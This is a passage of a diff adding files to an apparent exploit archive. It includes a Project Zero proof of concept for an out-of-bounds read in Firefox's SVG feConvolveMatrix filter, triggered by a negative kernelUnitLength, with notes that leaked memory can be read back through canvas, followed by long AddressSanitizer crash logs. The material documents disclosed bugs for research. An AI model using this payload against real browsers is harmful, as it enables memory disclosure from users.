+    #30 0x7fcef6dc6e8d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&, bool, nsCollapsingMargin&, int, bool, nsLineBox*, mozilla::ReflowInput&, nsReflowStatus&, mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3
+    #31 0x7fcef6dbc4da in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3462:7
+    #32 0x7fcef6dafafa in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2831:5
+    #33 0x7fcef6dafafa in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370
+    #34 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
+    #35 0x7fcef6e0ada0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
+    #36 0x7fcef6e09555 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:711:5
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/gfx/thebes/gfxFont.h:785:46 in IsSimpleGlyph
+Shadow bytes around the buggy address:
+  0x0c22800dc380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c22800dc390: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+  0x0c22800dc3a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x0c22800dc3b0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
+  0x0c22800dc3c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c22800dc3d0: 00 00 00 00 00 00 00 00 00[04]fa fa fa fa fa fa
+  0x0c22800dc3e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+  0x0c22800dc3f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x0c22800dc400: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
+  0x0c22800dc410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c22800dc420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==104545==ABORTING
+-->
\ No newline at end of file
diff --git a/platforms/multiple/dos/42072.html b/platforms/multiple/dos/42072.html
new file mode 100755
index 000000000..3bc708672
--- /dev/null
+++ b/platforms/multiple/dos/42072.html
@@ -0,0 +1,162 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1185
+
+Mozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1347617
+
+There is an out of bound read leading to memory disclosure in Firefox. The vulnerability was confirmed on the nightly ASan build. 
+
+PoC:
+
+=================================================================
+-->
+
+<svg filter="url(#f)">
+<filter id="f" filterRes="19" filterUnits="userSpaceOnUse">
+<feConvolveMatrix kernelMatrix="1 1 1 1 1 1 1 1 1" kernelUnitLength="1 -1" />
+
+<!--
+=================================================================
+
+Preliminary analysis:
+
+The problem seems to be the negative krenel unit length. This leads to an out of bound access in ConvolvePixel() and out-of-bounds data is going to be copied into the SVG image. From there, it can be extracted by an attacker by loading the SVG image into a canvas element.
+
+ASan log:
+
+=================================================================
+==25524==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f8cd2946336 at pc 0x7f8d3fcd397e bp 0x7ffc051ca390 sp 0x7ffc051ca388
+READ of size 1 at 0x7f8cd2946336 thread T0
+    #0 0x7f8d3fcd397d in ColorComponentAtPoint /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2293:10
+    #1 0x7f8d3fcd397d in ConvolvePixel<int> /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2358
+    #2 0x7f8d3fcd397d in already_AddRefed<mozilla::gfx::DataSourceSurface> mozilla::gfx::FilterNodeConvolveMatrixSoftware::DoRender<int>(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, int, int) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2509
+    #3 0x7f8d3fcd089a in mozilla::gfx::FilterNodeConvolveMatrixSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2379:12
+    #4 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
+    #5 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
+    #6 0x7f8d3fce4035 in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3140:10
+    #7 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
+    #8 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
+    #9 0x7f8d3fce4895 in mozilla::gfx::FilterNodeUnpremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3197:5
+    #10 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
+    #11 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
+    #12 0x7f8d3fcc7832 in mozilla::gfx::FilterNodeComponentTransferSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:1781:5
+    #13 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
+    #14 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
+    #15 0x7f8d3fce4685 in mozilla::gfx::FilterNodePremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3168:5
+    #16 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
+    #17 0x7f8d3fc7cb43 in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:580:14
+    #18 0x7f8d3fd8bc6e in mozilla::gfx::FilterSupport::RenderFilterDescription(mozilla::gfx::DrawTarget*, mozilla::gfx::FilterDescription const&, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, nsTArray<RefPtr<mozilla::gfx::SourceSurface> >&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/src/FilterSupport.cpp:1360:8
+    #19 0x7f8d44ccc3fd in nsFilterInstance::Render(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:545:3
+    #20 0x7f8d44ccb7ee in nsFilterInstance::PaintFilteredFrame(nsIFrame*, mozilla::gfx::DrawTarget*, gfxMatrix const&, nsSVGFilterPaintCallback*, nsRegion const*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:81:19
+    #21 0x7f8d44d09f72 in nsSVGIntegrationUtils::PaintFilter(nsSVGIntegrationUtils::PaintFramesParams const&) /home/worker/workspace/build/src/layout/svg/nsSVGIntegrationUtils.cpp:1094:5
+    #22 0x7f8d44f7e9bd in PaintAsLayer /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:8330:30
+    #23 0x7f8d44f7e9bd in PaintInactiveLayer /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:3722
+    #24 0x7f8d44f7e9bd in mozilla::FrameLayerBuilder::PaintItems(nsTArray<mozilla::FrameLayerBuilder::ClippedDisplayItem>&, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, mozilla::gfx::IntPointTyped<mozilla::gfx::UnknownUnits> const&, float, float, int) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6044
+    #25 0x7f8d44f819f2 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6233:19
+    #26 0x7f8d40034966 in mozilla::layers::ClientPaintedLayer::PaintThebes(nsTArray<mozilla::layers::ReadbackProcessor::Update>*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:85:5
+    #27 0x7f8d40035611 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:139:3
+    #28 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29
+    #29 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29
+    #30 0x7f8d4002fcb7 in mozilla::layers::ClientLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:358:13
+    #31 0x7f8d40030527 in mozilla::layers::ClientLayerManager::EndTransaction(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:411:3
+    #32 0x7f8d44ff4b51 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2253:17
+    #33 0x7f8d447e7554 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3714:12
+    #34 0x7f8d446eaf2a in mozilla::PresShell::Paint(nsView*, nsRegion const&, unsigned int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:6489:5
+    #35 0x7f8d43f4cff4 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /home/worker/workspace/build/src/view/nsViewManager.cpp:483:19
+    #36 0x7f8d43f4c54f in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:415:33
+    #37 0x7f8d43f4faed in nsViewManager::ProcessPendingUpdates() /home/worker/workspace/build/src/view/nsViewManager.cpp:1104:5
+    #38 0x7f8d44648596 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2031:11
+    #39 0x7f8d44654553 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7
+    #40 0x7f8d44654224 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5
+    #41 0x7f8d446569c5 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5
+    #42 0x7f8d446569c5 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624
+    #43 0x7f8d44656bfe in applyImpl<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), StoreCopyPassByConstLRef<mozilla::TimeStamp> , 0> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
+    #44 0x7f8d44656bfe in apply<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp)> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
+    #45 0x7f8d44656bfe in mozilla::detail::RunnableMethodImpl<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver*, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), true, false, mozilla::TimeStamp>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
+    #46 0x7f8d3e06238c in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
+    #47 0x7f8d3e05ecb8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
+    #48 0x7f8d3ee06e21 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
+    #49 0x7f8d3ed67980 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
+    #50 0x7f8d3ed67980 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
+    #51 0x7f8d3ed67980 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
+    #52 0x7f8d43fc682f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
+    #53 0x7f8d474273c1 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:30
+    #54 0x7f8d475e78ca in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4492:22
+    #55 0x7f8d475e9353 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4670:8
+    #56 0x7f8d475ea6dc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4761:21
+    #57 0x4eb2b3 in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:22
+    #58 0x4eb2b3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:307
+    #59 0x7f8d5914d82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
+    #60 0x41ce08 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41ce08)
+
+0x7f8cd2946336 is located 1226 bytes to the left of 162639-byte region [0x7f8cd2946800,0x7f8cd296e34f)
+allocated by thread T0 here:
+    #0 0x4bb873 in calloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:72:3
+    #1 0x7f8d3fd5a936 in Realloc /home/worker/workspace/build/src/gfx/2d/Tools.h:179:41
+    #2 0x7f8d3fd5a936 in mozilla::gfx::SourceSurfaceAlignedRawData::Init(mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SurfaceFormat, bool, unsigned char, int) /home/worker/workspace/build/src/gfx/2d/SourceSurfaceRawData.cpp:66
+    #3 0x7f8d3fc40c98 in mozilla::gfx::Factory::CreateDataSourceSurface(mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SurfaceFormat, bool) /home/worker/workspace/build/src/gfx/2d/Factory.cpp:878:16
+    #4 0x7f8d3fcb1bd7 in mozilla::gfx::GetDataSurfaceInRect(mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::ConvolveMatrixEdgeMode) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:434:5
+    #5 0x7f8d3fcb8903 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:753:15
+    #6 0x7f8d3fcd0d8d in already_AddRefed<mozilla::gfx::DataSourceSurface> mozilla::gfx::FilterNodeConvolveMatrixSoftware::DoRender<int>(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, int, int) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2460:5
+    #7 0x7f8d3fcd089a in mozilla::gfx::FilterNodeConvolveMatrixSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2379:12
+    #8 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
+    #9 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
+    #10 0x7f8d3fce4035 in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3140:10
+    #11 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
+    #12 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
+    #13 0x7f8d3fce4895 in mozilla::gfx::FilterNodeUnpremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3197:5
+    #14 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
+    #15 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
+    #16 0x7f8d3fcc7832 in mozilla::gfx::FilterNodeComponentTransferSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:1781:5
+    #17 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
+    #18 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25
+    #19 0x7f8d3fce4685 in mozilla::gfx::FilterNodePremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3168:5
+    #20 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21
+    #21 0x7f8d3fc7cb43 in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:580:14
+    #22 0x7f8d3fd8bc6e in mozilla::gfx::FilterSupport::RenderFilterDescription(mozilla::gfx::DrawTarget*, mozilla::gfx::FilterDescription const&, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, nsTArray<RefPtr<mozilla::gfx::SourceSurface> >&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/src/FilterSupport.cpp:1360:8
+    #23 0x7f8d44ccc3fd in nsFilterInstance::Render(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:545:3
+    #24 0x7f8d44ccb7ee in nsFilterInstance::PaintFilteredFrame(nsIFrame*, mozilla::gfx::DrawTarget*, gfxMatrix const&, nsSVGFilterPaintCallback*, nsRegion const*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:81:19
+    #25 0x7f8d44d09f72 in nsSVGIntegrationUtils::PaintFilter(nsSVGIntegrationUtils::PaintFramesParams const&) /home/worker/workspace/build/src/layout/svg/nsSVGIntegrationUtils.cpp:1094:5
+    #26 0x7f8d44f7e9bd in PaintAsLayer /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:8330:30
+    #27 0x7f8d44f7e9bd in PaintInactiveLayer /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:3722
+    #28 0x7f8d44f7e9bd in mozilla::FrameLayerBuilder::PaintItems(nsTArray<mozilla::FrameLayerBuilder::ClippedDisplayItem>&, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, mozilla::gfx::IntPointTyped<mozilla::gfx::UnknownUnits> const&, float, float, int) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6044
+    #29 0x7f8d44f819f2 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6233:19
+    #30 0x7f8d40034966 in mozilla::layers::ClientPaintedLayer::PaintThebes(nsTArray<mozilla::layers::ReadbackProcessor::Update>*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:85:5
+    #31 0x7f8d40035611 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:139:3
+    #32 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2293:10 in ColorComponentAtPoint
+Shadow bytes around the buggy address:
+  0x0ff21a520c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
